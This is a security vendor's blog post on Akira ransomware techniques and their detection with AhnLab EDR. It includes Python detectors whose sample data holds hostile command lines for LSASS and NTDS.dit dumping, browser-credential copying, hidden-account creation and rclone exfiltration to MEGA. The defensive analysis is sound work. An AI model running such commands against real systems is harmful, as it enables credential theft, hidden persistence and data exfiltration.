Detecting Akira Ransomware Attack Using AhnLab EDR

Akira is a relatively new ransomware group that has been active since March 2023. Like other ransomware operators, it breaches organizations and not only encrypts their files but also exfiltrates sensitive data to use as leverage in negotiations. As the 2024 statistics below show, the number of organizations affected by Akira ransomware remains high. [1]

Figure 1. Number of Organizations Hit by Ransomware Attacks in 2024

After encrypting the organization’s systems, the threat actor directs victims to the Akira TOR site for ransom negotiation and threatens to publish the stolen data if its demands are not met. Victims are continuously listed on the leak site the group operates on TOR.

Figure 2. Akira ransomware’s TOR site

The threat actor’s initial access is known to come through VPN accounts without multi-factor authentication (MFA) or through exploitation of various vulnerabilities. Notable examples are Fortinet’s CVE-2019-6693, CVE-2022-40684, and CVE-2023-48788, Cisco’s CVE-2020-3259 and CVE-2023-20269, and SonicWall’s CVE-2024-40766. Once inside, the Akira ransomware threat actor has also exploited vulnerabilities in Veeam Backup & Replication (CVE-2024-40711) and VMware ESXi (CVE-2024-37085) for privilege escalation.

This post introduces the known attack methods of the Akira ransomware threat actor and the techniques observed as it extends control over a victim organization after the initial breach [2] [3] [4] [5], and shows how these techniques can be detected with AhnLab EDR.

AhnLab EDR (Endpoint Detection and Response) is a next-generation endpoint threat detection and response solution that provides threat monitoring, analysis, and response capabilities. It continuously collects suspicious behavior by type, so that users can accurately assess threats from the detection, analysis, and response perspectives, identify root causes, respond appropriately, and establish prevention processes.

Figure 3. AhnLab EDR

 

1. Discovery

Threat actors use port scanning to learn which hosts and ports are active on a network, that is, which services are running, and to map the network structure, including subnets and hosts. The Akira ransomware threat actor is known to use tools such as Advanced IP Scanner or NetScan for this network information collection.

Afterward, they use Active Directory in the victim environment to collect information on domain trusts and domain controllers, either with the built-in Windows tool Nltest or with the widely used third-party tool AdFind. The AdFind output lets them understand the structure of the domain and select targets for lateral movement.

Finally, the use of BloodHound has also been observed. BloodHound, with its SharpHound collector, gathers Active Directory domain data to find attack paths for privilege escalation and displays the results as a graph in a GUI, visualizing the shortest path by which a threat actor can obtain domain administrator privileges.
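As an added illustration of the detection logic such Discovery telemetry lends itself to (an example written for this edit, not code from the original post or from AhnLab EDR), the following Python script maps process-creation command lines to the discovery techniques described above and flags a host that performs three or more distinct techniques within ten minutes. The regular expressions, the threshold, and the sample events are assumptions constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Example rules mapping command-line patterns to the discovery techniques the
# text describes. They are illustrative, not AhnLab EDR's signatures.
DISCOVERY_RULES = [
    (r"\bnltest(\.exe)?\b.*/dclist",                        "T1018 Remote System Discovery"),
    (r"\bnltest(\.exe)?\b.*/domain_trusts",                 "T1482 Domain Trust Discovery"),
    (r"\badfind(\.exe)?\b.*-sc\s+trustdmp",                 "T1482 Domain Trust Discovery"),
    (r"\badfind(\.exe)?\b.*objectcategory=(person|user)\b", "T1087.002 Domain Account Discovery"),
    (r"\badfind(\.exe)?\b.*objectcategory=group\b",         "T1069.002 Domain Groups Discovery"),
    (r"\badfind(\.exe)?\b.*objectcategory=computer\b",      "T1018 Remote System Discovery"),
    (r"\bsharphound(\.exe)?\b|--collectionmethods?\b",      "BloodHound/SharpHound collection"),
    (r"\b(advanced_ip_scanner|netscan)(\.exe)?\b",          "T1046 Network Service Discovery"),
]
COMPILED_RULES = [(re.compile(p, re.IGNORECASE), tech) for p, tech in DISCOVERY_RULES]


def classify(cmdline):
    """Return the set of discovery techniques a process command line matches."""
    return {tech for rx, tech in COMPILED_RULES if rx.search(cmdline)}


def detect_discovery_bursts(events, window=timedelta(minutes=10), threshold=3):
    """Alert on hosts that run `threshold` or more distinct discovery techniques
    within `window`. A lone nltest is routine administration; nltest, AdFind and
    SharpHound back to back within minutes is the pattern described above."""
    per_host = defaultdict(list)
    for ev in events:
        for tech in classify(ev["cmdline"]):
            per_host[ev["host"]].append(
                (datetime.fromisoformat(ev["time"]), tech, ev["cmdline"]))
    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        for i, (start, _, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - start <= window]
            techniques = sorted({h[1] for h in in_window})
            if len(techniques) >= threshold:
                alerts[host] = {"start": start.isoformat(),
                                "techniques": techniques,
                                "commands": [h[2] for h in in_window]}
                break  # one alert per host is enough for triage
    return alerts


# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2025-01-10T09:00:12", "cmdline": "nltest /dclist:corp.local"},
    {"host": "WS01", "time": "2025-01-10T09:02:40", "cmdline": 'AdFind.exe -f "objectcategory=person" -csv'},
    {"host": "WS01", "time": "2025-01-10T09:05:03", "cmdline": "SharpHound.exe --CollectionMethods All --ZipFileName corp.zip"},
    {"host": "WS01", "time": "2025-01-10T09:06:30", "cmdline": "netscan.exe /range:10.0.0.1-10.0.0.254"},
    {"host": "WS02", "time": "2025-01-10T09:00:00", "cmdline": "nltest /dclist:corp.local"},
    {"host": "WS02", "time": "2025-01-11T14:00:00", "cmdline": "ipconfig /all"},
]

if __name__ == "__main__":
    for host, alert in detect_discovery_bursts(SAMPLE_EVENTS).items():
        print(host, alert["start"], alert["techniques"])
```

Only WS01 is reported: its four techniques fall inside one ten-minute window, whereas WS02 runs a single nltest and an unrelated ipconfig a day apart.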

Figure 4. EDR detection on the behaviors of the threat actor in the Discovery phase

 

2. Credential Access

If the victim organization’s infrastructure uses Active Directory, threat actors build on the Discovery phase above to collect domain information and steal credentials, which they then use to move laterally through the network and ultimately take control of the domain.

The Akira ransomware threat actor is known to use Mimikatz or comsvcs.dll for this purpose. Mimikatz is a program that extracts credentials on Windows; among other methods, it extracts the NT hash (the hash used by the NTLM authentication protocol) from the memory of the LSASS process.

However, dumping LSASS memory is treated as suspicious by security solutions, and tools like Mimikatz are key detection targets. One way to sidestep detection of the tool itself is to use comsvcs.dll, which ships with Windows: its exported MiniDump function, invoked through rundll32.exe, writes a memory dump of the LSASS process that can then be processed offline.

They also use the open-source tool LaZagne, which extracts credentials stored on the system. For example, it can dump the Security Accounts Manager (SAM) database, which stores local account credentials that can be reused for lateral movement. On Active Directory servers, the “ntdsutil.exe” tool is used to dump the NTDS.dit file, which contains the user accounts, groups, policies, and password hashes of the Active Directory environment.

Besides credentials held by the operating system, credentials stored in web browsers are also targeted. Threat actors use WebBrowserPassView, a tool developed by NirSoft, or use “esentutl.exe” to copy the data file that holds saved credentials for the Chrome web browser, which is otherwise locked while the browser is running.
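The comsvcs.dll, ntdsutil and esentutl techniques above all leave a recognizable command line. The following Python example (added for this edit; not the original post’s code or AhnLab’s detection logic) classifies such command lines, matching the MiniDump export by name or by its ordinal, #24, and checking the target pid against a process table so that a renamed copy of comsvcs.dll is still caught when its target is lsass.exe. The process table and command lines are constructed assumptions.

```python
import re

# Constructed process table: pid -> image name. The detector needs to know
# which pid is lsass.exe to judge what a MiniDump call is aimed at.
SAMPLE_PROCESSES = {712: "lsass.exe", 4520: "notepad.exe"}

# rundll32 <any dll>, MiniDump|#24 <pid> <dump path> [full]
# #24 is the ordinal of comsvcs.dll's MiniDump export. Matching the entry point
# and the target pid, not only the DLL name, also catches a renamed copy.
MINIDUMP_RX = re.compile(
    r"\brundll32(\.exe)?\s+(?P<dll>[^\s,]+)[\s,]+(?P<entry>minidump|#24)\s+(?P<pid>\d+)\s+(?P<out>\S+)")
# ntdsutil "ac i ntds" ifm "create full <dir>" q q  (NTDS.dit plus SYSTEM hive)
NTDSUTIL_RX = re.compile(
    r"\bntdsutil(\.exe)?\b.*\bac(tivate)?\s+i(nstance)?\s+ntds\b.*\bifm\b.*\bcreate\s+full\b")
# esentutl /y <locked file> /d <copy> [/vss] copies files a running process holds open
ESENTUTL_RX = re.compile(
    r"\besentutl(\.exe)?\b.*\s/y\b.*(?P<file>login data|ntds\.dit|\\sam\b)")


def normalize(cmdline):
    """Lower-case, drop quotes and collapse whitespace so that case changes,
    quoting and padding do not defeat the patterns."""
    return " ".join(cmdline.replace('"', "").split()).lower()


def detect_credential_access(cmdline, processes):
    """Classify one process command line. Returns an alert dict or None."""
    cmd = normalize(cmdline)
    m = MINIDUMP_RX.search(cmd)
    if m:
        pid = int(m.group("pid"))
        target = processes.get(pid, "unknown")
        return {"rule": "comsvcs MiniDump via rundll32", "technique": "T1003.001",
                "dll": m.group("dll"), "entry": m.group("entry"),
                "target_pid": pid, "target": target, "dump": m.group("out"),
                # dumping an arbitrary process can be legitimate debugging; lsass cannot
                "severity": "high" if target == "lsass.exe" else "medium"}
    if NTDSUTIL_RX.search(cmd):
        return {"rule": "ntdsutil IFM dump of NTDS.dit", "technique": "T1003.003",
                "severity": "high"}
    m = ESENTUTL_RX.search(cmd)
    if m:
        f = m.group("file")
        technique = {"login data": "T1555.003", "ntds.dit": "T1003.003"}.get(f, "T1003.002")
        return {"rule": "esentutl copy of locked credential store", "technique": technique,
                "file": f, "severity": "high"}
    return None


# Constructed command lines (not captured from a real incident).
SAMPLE_CMDLINES = [
    r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 712 C:\temp\lsass.dmp full",
    r"RUNDLL32 c:\temp\svc.dll #24 712 c:\temp\out.bin full",          # renamed copy, ordinal call
    r"rundll32.exe comsvcs.dll, MiniDump 4520 C:\temp\np.dmp full",     # dump of a non-LSASS process
    r'ntdsutil "ac i ntds" "ifm" "create full C:\temp\ad" q q',
    r'esentutl.exe /y "C:\Users\bob\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d C:\temp\ld.db /vss',
    r"rundll32.exe shell32.dll,Control_RunDLL",                          # benign rundll32 use
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(detect_credential_access(c, SAMPLE_PROCESSES))
```

The pid lookup is what separates the second sample (a renamed DLL called by ordinal, still aimed at lsass.exe) from the third (a MiniDump of notepad.exe, which only warrants a medium alert).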

Figure 5. EDR detection of threat actor’s behavior during the Credential Access phase

 

3. Command and Control

To control infected systems, remote management tools such as AnyDesk, RustDesk, and Radmin are usually installed. Because these tools are also widely used for legitimate remote control and administration, antivirus solutions cannot simply detect and block them. AhnLab EDR collects information on how remote management tools are used even when the use is legitimate, so that administrators can recognize suspicious use and respond to it.

Threat actors not only communicate directly with the C&C server but also install proxy tools, mainly to expose infected systems that cannot be reached from outside, such as hosts behind NAT. The Akira ransomware threat actor is known to have used Ngrok and Cloudflare’s tunneling tool (Cloudflare Tunnel) in its attacks.

Figure 6. EDR detection of threat actor’s behaviors in the Command and Control phase

 

4. Persistence / Defense Evasion

The Akira ransomware threat actor maintains persistence by adding a new account with which to control the infected system. Because a newly added account appears on the logon screen, where the system’s user would notice it, the threat actor registers the account under the SpecialAccounts\UserList registry key (HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList, with the account name as a DWORD value set to 0) to hide it from the logon screen.
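The create-then-hide sequence can be correlated from two telemetry sources, an account-creation event and a registry write under the SpecialAccounts\UserList key (the same write a `reg add` command line produces). The Python example below was added for this edit and is not code from the original post or AhnLab EDR; the event format, the 24-hour correlation window, and the sample events are assumptions.

```python
import re
from datetime import datetime, timedelta

# The key Windows consults to hide accounts from the logon screen: a REG_DWORD
# named after the account, set to 0, hides it (1 shows it again).
USERLIST_KEY = r"hklm\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist"

REG_ADD_RX = re.compile(
    r'\breg(\.exe)?\s+add\s+"?(?P<key>[^"]+?)"?\s+/v\s+(?P<name>\S+)\s+/t\s+reg_dword\s+/d\s+(?P<data>\d+)',
    re.IGNORECASE)


def normalize_key(key):
    """Registry sensors and command lines spell the hive differently; unify them."""
    return key.strip().rstrip("\\").lower().replace("hkey_local_machine", "hklm")


def reg_add_to_event(cmdline, host, time):
    """Turn a `reg add ... /v <user> /t REG_DWORD /d <n>` command line into the
    same registry_set record a registry sensor would emit (or None)."""
    m = REG_ADD_RX.search(cmdline)
    if not m:
        return None
    return {"type": "registry_set", "host": host, "time": time,
            "key": m.group("key"), "value": m.group("name"), "data": m.group("data")}


def detect_hidden_accounts(events, window=timedelta(hours=24)):
    """Flag writes of <user>=0 under the SpecialAccounts UserList key. If the
    same user was created on that host within `window` beforehand, the
    create-then-hide sequence is complete and the alert is raised to high."""
    created = {}  # (host, user) -> creation time
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["type"] == "account_created":
            created[(ev["host"], ev["user"].lower())] = t
        elif (ev["type"] == "registry_set"
              and normalize_key(ev["key"]) == USERLIST_KEY
              and int(ev["data"]) == 0):
            created_at = created.get((ev["host"], ev["value"].lower()))
            recent = created_at is not None and t - created_at <= window
            alerts.append({"host": ev["host"], "user": ev["value"], "hidden_at": ev["time"],
                           "created_at": created_at.isoformat() if created_at else None,
                           "severity": "high" if recent else "medium"})
    return alerts


# Constructed events (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "account_created", "host": "SRV01", "time": "2025-01-10T22:00:10", "user": "itadm"},
    reg_add_to_event(r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v itadm /t REG_DWORD /d 0 /f',
                     "SRV01", "2025-01-10T22:03:45"),
    # No creation event on SRV02: an existing account being hidden is still worth a look.
    {"type": "registry_set", "host": "SRV02", "time": "2025-01-10T23:00:00",
     "key": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList",
     "value": "Guest", "data": "0"},
    # /d 1 makes the account visible again, so this one must not alert.
    reg_add_to_event(r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v helpdesk /t REG_DWORD /d 1 /f',
                     "SRV03", "2025-01-11T08:00:00"),
]

if __name__ == "__main__":
    for alert in detect_hidden_accounts(SAMPLE_EVENTS):
        print(alert)
```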

Figure 7. EDR detection of account hiding behavior

 

5. Lateral Movement

Threat actors move laterally within the organization’s internal network using the credentials collected in the Credential Access phase. The Akira ransomware threat actor used these credentials to take control of further systems over RDP or by executing commands remotely with PsExec and Impacket’s wmiexec.
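Both tools leave host artifacts that do not depend on which credentials were used: wmiexec runs its command under WmiPrvSE.exe and redirects output to \\127.0.0.1\ADMIN$\__<timestamp>, while PsExec installs a PSEXESVC service and talks over named pipes whose names end in <host>-<pid>-stdin/stdout/stderr even when the service is renamed with -r. The Python example below (added for this edit, not the original post’s or AhnLab’s code) checks constructed process, service and pipe events for these artifacts; the event format is an assumption.

```python
import re

# wmiexec.py runs `cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1`
# under WmiPrvSE.exe and reads the output file back over SMB.
WMIEXEC_RX = re.compile(r"\\\\127\.0\.0\.1\\admin\$\\__\d+", re.IGNORECASE)
# PsExec pipes: \PSEXESVC-<host>-<pid>-stdin|stdout|stderr. With `-r` the service
# (and so the pipe prefix) is renamed, but the <host>-<pid>-stdXXX tail stays.
PSEXEC_PIPE_RX = re.compile(
    r"^\\?(?P<svc>[^\\-]+)-(?P<host>.+)-(?P<pid>\d+)-(stdin|stdout|stderr)$", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def detect_lateral_movement(ev):
    """Classify one event (process start, service install or named pipe). Returns an alert or None."""
    kind = ev["type"]
    if kind == "process":
        parent, image = ev["parent"].lower(), ev["image"].lower()
        if WMIEXEC_RX.search(ev["cmdline"]):
            return {"tool": "Impacket wmiexec", "technique": "T1021.002",
                    "severity": "high", "host": ev["host"]}
        if parent == "wmiprvse.exe" and image in SHELLS:
            # wmiexec -nooutput (or any WMI-driven shell) leaves no ADMIN$ redirect
            return {"tool": "WMI-spawned shell", "technique": "T1021.002",
                    "severity": "medium", "host": ev["host"]}
    elif kind == "service":
        if re.search(r"psexesvc", ev["name"] + " " + ev["image_path"], re.IGNORECASE):
            return {"tool": "PsExec service", "technique": "T1570",
                    "severity": "high", "host": ev["host"]}
    elif kind == "pipe":
        m = PSEXEC_PIPE_RX.match(ev["name"])
        if m:
            renamed = m.group("svc").lower() != "psexesvc"
            return {"tool": "PsExec pipe" + (" (renamed service)" if renamed else ""),
                    "technique": "T1570", "severity": "high",
                    "host": ev["host"], "service": m.group("svc")}
    return None


def scan(events):
    """Run the classifier over a batch and keep only the hits."""
    return [a for a in (detect_lateral_movement(e) for e in events) if a]


# Constructed events (not real telemetry).
SAMPLE_EVENTS = [
    {"type": "process", "host": "FS01", "parent": "WmiPrvSE.exe", "image": "cmd.exe",
     "cmdline": r"cmd.exe /Q /c whoami 1> \\127.0.0.1\ADMIN$\__1736500000.12 2>&1"},
    {"type": "process", "host": "FS01", "parent": "WmiPrvSE.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /Q /c net user x P@ss /add"},
    {"type": "service", "host": "DC01", "name": "PSEXESVC", "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"type": "pipe", "host": "DC01", "name": r"\PSEXESVC-WS01-4412-stdin"},
    {"type": "pipe", "host": "DC01", "name": r"\svcmgr-WS-01-4412-stdout"},   # renamed with -r
    {"type": "process", "host": "WS09", "parent": "explorer.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c dir"},
    {"type": "pipe", "host": "WS09", "name": r"\lsass"},
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The pipe rule is the one that survives renaming: the fifth sample uses a service called svcmgr, yet the host-pid-stdout tail still identifies it as PsExec.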

Figure 8. EDR detection on behaviors of the threat actor in the Lateral Movement phase

 

6. Collection / Exfiltration

Like other ransomware threat actors, the Akira ransomware threat actor encrypts the organization’s systems and extorts it by threatening to leak stolen data. To that end, they collect sensitive information from compromised systems, compress it, and exfiltrate it.

Many tools can compress files and folders, but the Akira ransomware threat actor is known to mainly use WinRAR. The archives are then exfiltrated over FTP or to a cloud storage service: WinSCP and FileZilla were used for FTP, while the cloud storage service Mega was used either directly or through the Rclone tool.

Rclone is a command-line program for transferring files to and from many cloud storage services. It runs on most operating systems, including Windows, Linux, and macOS, and supports most cloud services, such as Dropbox, Google Drive, Microsoft OneDrive, and MEGA.
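Because attackers often rename the rclone binary and keep credentials in a dropped configuration file, a detection keyed on the file name alone is weak. The following Python example, added for this edit rather than taken from the original post or AhnLab EDR, parses an rclone-style command line regardless of the binary name, separates source and destination from the flags, works out whether data is being uploaded to a remote, and records the --config path and --transfers setting for triage. The sample command lines and the set of value-taking flags are assumptions.

```python
import re

TOKEN_RX = re.compile(r'"[^"]*"|\S+')
TRANSFER_CMDS = {"copy", "sync", "move", "copyto", "moveto"}
# rclone flags that take a value (so the value is not mistaken for a path)
VALUE_FLAGS = {"--config", "--transfers", "--checkers", "--bwlimit", "--log-file",
               "--include", "--exclude", "--filter", "--max-age", "--min-size",
               "--mega-user", "--mega-pass", "--multi-thread-streams"}
REMOTE_RX = re.compile(r"^:?[A-Za-z0-9_.-]+:")   # name:path or :backend:path
DRIVE_RX = re.compile(r"^[A-Za-z]:(\\|/|$)")      # C:\... is a local path, not a remote


def is_remote(arg):
    """True for an rclone remote (configured name or :backend: string), False for local paths."""
    return bool(REMOTE_RX.match(arg)) and not DRIVE_RX.match(arg)


def parse_rclone(cmdline):
    """Parse an rclone-style command line, whatever the binary is called, and
    describe the transfer. Returns None if it is not an rclone transfer."""
    toks = [t.strip('"') for t in TOKEN_RX.findall(cmdline)]
    sub = next((i for i, t in enumerate(toks[1:], 1) if t.lower() in TRANSFER_CMDS), None)
    if sub is None:
        return None
    flags, paths = {}, []
    i = sub + 1
    while i < len(toks):
        tok = toks[i]
        if tok.startswith("-"):
            name, _, val = tok.partition("=")
            if not val and name.lower() in VALUE_FLAGS and i + 1 < len(toks):
                i += 1
                val = toks[i]
            flags[name.lower()] = val or True
        else:
            paths.append(tok)
        i += 1
    if len(paths) < 2:
        return None
    src, dst = paths[0], paths[1]
    if is_remote(dst) and not is_remote(src):
        direction = "upload"            # local data leaving the host: the exfiltration case
    elif is_remote(src) and not is_remote(dst):
        direction = "download"
    elif is_remote(src):
        direction = "remote-to-remote"
    else:
        direction = "local"
    remote = dst if is_remote(dst) else (src if is_remote(src) else None)
    mega_flags = any(f.startswith("--mega-") for f in flags)
    if remote is None:
        backend = None
    elif remote.lower().startswith(":mega:") or mega_flags:
        backend = "mega"
    elif remote.startswith(":"):
        backend = remote.split(":")[1]  # :backend: connection string names the type directly
    else:
        # a named remote's type lives in the rclone.conf it points at, so report the name
        backend = "named remote %r (type defined in --config)" % remote.split(":")[0]
    return {"binary": toks[0], "command": toks[sub].lower(), "src": src, "dst": dst,
            "direction": direction, "backend": backend,
            "config": flags.get("--config"), "transfers": flags.get("--transfers"),
            "severity": "high" if direction == "upload" else "low"}


# Constructed command lines (not captured from a real incident).
SAMPLE_CMDLINES = [
    r'rclone.exe copy "C:\Shares\Finance" mega:exfil --transfers 32 --ignore-existing -P --config C:\Users\Public\rclone.conf',
    r"svchost.exe sync C:\Data :mega:dump --mega-user a@b.example --mega-pass xyz -q",  # renamed binary
    r"rclone.exe copy backup:corp D:\restore",   # restore from a remote, not exfiltration
    r"rclone.exe lsd mega:",                     # listing only
    r"robocopy C:\a D:\b /E",
]

if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(parse_rclone(c))
```

A single-letter remote name such as `m:` would be indistinguishable from a drive letter by this heuristic; rclone itself treats such names as drives on Windows, so this is a limitation to keep in mind rather than a bug in the check.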

Figure 9. EDR detection on threat actor’s behaviors during information theft

 

7. Impact

Akira ransomware encrypts user files and appends the “.akira” extension. It also drops a ransom note named “akira_readme.txt”, which contains an Onion address and a code the victim must use to log in to the negotiation chat.
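The encryption itself shows up in file telemetry as one process appending the same extension to many files in quick succession and then dropping the note. The Python example below, added for this edit (not code from the original post or AhnLab EDR), keeps a sliding window of renames per process and extension, alerts at a threshold of ten renames in thirty seconds, and separately records creation of akira_readme.txt; the thresholds and sample events are assumptions.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

RANSOM_NOTE = "akira_readme.txt"


def appended_extension(old_path, new_path):
    """Return the extension a rename appended (report.docx -> report.docx.akira
    gives 'akira'), or None if the rename did not simply append one."""
    if new_path.lower().startswith(old_path.lower() + "."):
        return new_path[len(old_path) + 1:].lower()
    return None


def detect_mass_rename(events, window=timedelta(seconds=30), threshold=10):
    """Flag a process that appends the same extension to `threshold` files within
    `window`, or drops the Akira ransom note. Keyed by pid and observed extension,
    not by the literal '.akira', so it still fires if the extension changes."""
    recent = defaultdict(deque)   # (pid, extension) -> rename timestamps inside the window
    alerts = {}

    def entry(ev):
        return alerts.setdefault(ev["pid"], {"image": ev["image"], "extension": None,
                                             "renames": 0, "ransom_note": None})

    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["op"] == "create" and ev["path"].lower().endswith("\\" + RANSOM_NOTE):
            entry(ev)["ransom_note"] = ev["path"]
        if ev["op"] != "rename":
            continue
        ext = appended_extension(ev["path"], ev["new_path"])
        if ext is None:
            continue
        q = recent[(ev["pid"], ext)]
        q.append(t)
        while t - q[0] > window:      # q is never empty here: t was just appended
            q.popleft()
        if len(q) >= threshold:
            e = entry(ev)
            e["extension"] = ext
            e["renames"] = max(e["renames"], len(q))
    return alerts


def build_sample_events():
    """Constructed file events: one process encrypting a folder, one user renaming files by hand."""
    base = datetime(2025, 1, 10, 3, 0, 0)
    events = []
    for i in range(12):
        events.append({"time": (base + timedelta(seconds=1.5 * i)).isoformat(), "pid": 5120,
                       "image": "w.exe", "op": "rename",
                       "path": rf"C:\Data\file{i}.docx", "new_path": rf"C:\Data\file{i}.docx.akira"})
    events.append({"time": (base + timedelta(seconds=20)).isoformat(), "pid": 5120,
                   "image": "w.exe", "op": "create", "path": r"C:\Data\akira_readme.txt"})
    events.append({"time": (base + timedelta(seconds=5)).isoformat(), "pid": 880,
                   "image": "explorer.exe", "op": "rename",
                   "path": r"C:\Users\bob\a.txt", "new_path": r"C:\Users\bob\b.txt"})
    events.append({"time": (base + timedelta(seconds=6)).isoformat(), "pid": 880,
                   "image": "explorer.exe", "op": "rename",
                   "path": r"C:\Users\bob\c.txt", "new_path": r"C:\Users\bob\c.txt.bak"})
    return events


if __name__ == "__main__":
    for pid, alert in detect_mass_rename(build_sample_events()).items():
        print(pid, alert)
```

Raising the threshold above the number of renames in the sample still leaves the pid in the output, because the ransom note alone is enough to create an entry; in practice the note and the rename burst arrive together and reinforce each other.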

Figure 10. EDR detection of Akira ransomware

 

8. Conclusion

The Akira ransomware threat actor has been active from March 2023 to the present day (January 2025). It exploits known vulnerabilities or stolen accounts to infiltrate organizations, takes control of their internal networks, collects sensitive information, and ultimately encrypts their systems, using both as leverage in negotiations for profit.

AhnLab EDR detects the attack techniques of the Akira ransomware threat actor as well as the behavior of the ransomware itself, allowing administrators to identify causes and establish appropriate response and prevention processes. It also reports suspicious behavior, such as the installation and execution of suspicious tools within the organization, as key behavior, so that administrators can be aware of it and respond.

 

Behavior Detection
– Execution/EDR.SharpHound.M11547
– LateralMovement/EDR.ADFind.M10710
– Infostealer/DETECT.Nltest.M10657
– Execution/EDR.AdvancedScanner.M12194
– Execution/EDR.Behavior.M10482
– CredentialAccess/EDR.Mimikatz.M11444
– CredentialAccess/EDR.Comsvc.M11596
– CredentialAccess/MDP.Dump.M11773
– CredentialAccess/EDR.NTDSUtil.M12395
– Execution/EDR.Event.M10819
– CredentialAccess/EDR.Password.M12276
– Execution/DETECT.AnyDesk.M11495
– Execution/DETECT.RustDesk.M12042
– Execution/DETECT.Radmin.M12410
– Execution/EDR.Ngrok.11445
– Execution/EDR.Proxy.M12411
– Suspicious/DETECT.MT1136.M2445
– Persistence/EDR.HideAccount.M11388
– LateralMovement/EDR.PSExec.M10481
– LateralMovement/EDR.Impacket.M12414
– Infostealer/DETECT.WinRAR.M12364
– Execution/DETECT.WinSCP.M11619
– Execution/DETECT.FileZilla.M11618
– Infostealer/EDR.Rclone.M11475
– Ransom/EDR.Decoy.M2470

 

MITRE ATT&CK Mapping Information

Discovery (TA0007)
– Remote System Discovery (T1018)
– System Owner/User Discovery (T1033)
– Network Service Discovery (T1046)
– Permission Groups Discovery: Local Groups (T1069.001)
– Permission Groups Discovery: Domain Groups (T1069.002)
– Account Discovery: Local Account (T1087.001)
– Account Discovery: Domain Account (T1087.002)
– Domain Trust Discovery (T1482)
– Group Policy Discovery (T1615)

Credential Access (TA0006)
– OS Credential Dumping: LSASS Memory (T1003.001)
– OS Credential Dumping: Security Account Manager (T1003.002)
– OS Credential Dumping: NTDS (T1003.003)
– Credentials from Password Stores: Credentials from Web Browsers (T1555.003)

Command and Control (TA0011)
– Remote Access Software (T1219)
– Proxy (T1090)
– Protocol Tunneling (T1572)

Persistence (TA0003)
– Create Account (T1136)

Defense Evasion (TA0005)
– Hide Artifacts: Hidden Users (T1564.002)

Lateral Movement (TA0008)
– Lateral Tool Transfer (T1570)
– Remote Services: SMB/Windows Admin Shares (T1021.002)

Collection (TA0009)
– Archive Collected Data: Archive via Utility (T1560.001)

Exfiltration (TA0010)
– Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)
– Exfiltration Over Web Service: Exfiltration to Cloud Storage (T1567.002)

Impact (TA0040)
– Financial Theft (T1657)
– Data Encrypted for Impact (T1486)